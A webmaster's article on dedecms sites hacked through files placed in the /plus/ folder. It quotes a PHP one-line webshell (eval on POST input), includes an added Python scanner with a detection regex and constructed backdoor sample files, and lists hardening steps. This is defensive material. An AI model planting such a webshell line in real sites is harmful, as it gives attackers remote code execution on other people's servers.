Based on my own website's experience, which is similar to that of others, the files written by attackers are mainly placed in the /plus/ folder. The files known so far include ga.php, log.php, b.php, b1.php, and so on. These files are short and contain very little. Writing them may not have been very convenient, but the capabilities of this code are by no means small.
Below is some of the code in the ga.php file:
<title>login</title>no<?php eval($_POST[1])?><title>login</title>no<?php eval($_POST[1])?><title>login</title>no<?php eval($_POST[1])?>
The actual file is longer than the excerpt above, but it is just this same code repeated. The code in log.php is similar: a single statement, simple and clear. Anyone with a little knowledge of network security will recognize it as a PHP one-line webshell (a "one-sentence Trojan"). The code can be executed with certain dedicated tools, and is presumably meant for password cracking.
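A defender-side check for the pattern quoted above, as an added example that is not part of the original article: it sweeps a web root for PHP files that pass request input straight to eval or assert. The regular expression, the extension list and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Matches eval/assert called directly on request input, tolerating case and
# whitespace, e.g. <?php eval($_POST[1])?> or "Eval ( $_REQUEST ['x'] )".
SHELL_RE = re.compile(
    rb"\b(eval|assert)\s*\(\s*@?\s*\$_(POST|GET|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)
PHP_EXT = {".php", ".php3", ".php5", ".phtml", ".inc"}  # assumed list


def scan(root):
    """Return {relative_path: hit_count} for PHP files matching SHELL_RE."""
    root = Path(root)
    hits = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in PHP_EXT:
            continue
        try:
            data = path.read_bytes()
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
        count = len(SHELL_RE.findall(data))
        if count:
            hits[path.relative_to(root).as_posix()] = count
    return hits


def demo():
    """Build a constructed site tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        plus = Path(tmp, "plus")
        plus.mkdir()
        # Constructed copy of the repeated pattern quoted in this article.
        (plus / "ga.php").write_bytes(
            b"<title>login</title>no<?php eval($_POST[1])?>" * 3)
        # Constructed variant with odd case and spacing.
        (plus / "log.php").write_bytes(b"<?PHP Eval ( $_POST [1] ) ?>")
        # Constructed benign file that must not be flagged.
        (plus / "search.php").write_bytes(b"<?php echo 'evaluation'; ?>")
        return scan(tmp)


if __name__ == "__main__":
    for name, count in demo().items():
        print(f"{count:3d}  {name}")
```

A plain pattern match like this only catches unobfuscated variants, so treat an empty result as "nothing obvious found" and still review unexpected files in /plus/ by hand.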
Now that we know which vulnerability the other party uses and how they exploit it, how can we prevent these dangerous incidents? After going through a large amount of information, I have put together the following preliminary steps to prevent the vulnerability from being exploited, hoping they will help other webmasters who also use dedecms.
1. Upgrade, apply patches, and set directory permissions
This is the official solution to this problem. No matter which version of dedecms you are using, you must apply the patches through the automatic update in the back end. This is the most important step in preventing the vulnerability from being exploited. The official website also provides directory permission settings: mainly, set data, templets, uploads, and a to read/write permissions with no execute permission; the include, member, plus, and back-end management directories are set with execute, read, and write permissions. Delete the install and special directories. See the official instructions for how to make these settings.
2. Change the admin account and password
Attackers may take the default admin account name and then guess the password in order to break in, so it is very important to change the default admin account. There are many ways to do this. A more effective one is to log on to the website database with phpMyAdmin, find the dede_admin table (dede is the table prefix), and modify the userid and pwd fields, setting pwd to f297a57a5a743894a0e4, which is the stored value for the default password admin. After this change, log on to the dede back end and change the password there.
3. Other important points
As for further details, try not to choose hosting that is too cheap. Hosting that is too cheap can easily mean security problems on the server itself, and once the server has a problem, the websites on it cannot be saved. In addition, the administrator password should be changed at least once a month, so that it cannot be guessed from a password shared with other accounts.